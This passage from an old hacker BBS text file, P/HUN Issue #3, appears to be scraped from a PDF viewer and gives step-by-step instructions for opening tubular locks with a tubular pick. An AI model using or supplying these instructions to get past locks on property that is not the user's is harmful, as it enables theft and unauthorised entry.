lock pick, is the instructions that come with it. However, as these may not be available, thesegeneral notes will get you started. Also HPC has a tutorial on using tubular lock picks(Basic
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 50/50
Picking and Servicing Tubular Locks) (a bit costly, but if it is as good as other HPC tutorials I've
seen, it may be worth it). GENERAL INSTRUCTIONS: --------------------- 1. Take the pick and slide
the feelers(the moveable tines) back and forth a few times. Slide all of them (usually 7) out
past the end of the tool a bit(maybe 1/8th of a inch or so). Then press the tool aginst a hard
surface until all of the feelers are flush with the end of the tool. 2.Insert the tool into the front
of the lock and gently push it all of the way into the lock. Then rotate the tool in the directionrequired for opening, but use a minimum of force, as excessive force will cause 2 difficulties:
1.The front of the pick may be damaged. 2.The lock may not be able to be open at all, or if it
can it may be damaged. After rotating the pick, slowly pump it in and out of the lock but note
that the pick should only be backed out about 1/8 inch or so. Keep doing this;eventually the
lock should open. If not...start again from the start. =-=-=-[ End of P/HUN Issue #3 :: Hacker's
Den BBS (718)358/9209 ]-=-=-=-=-=-=-=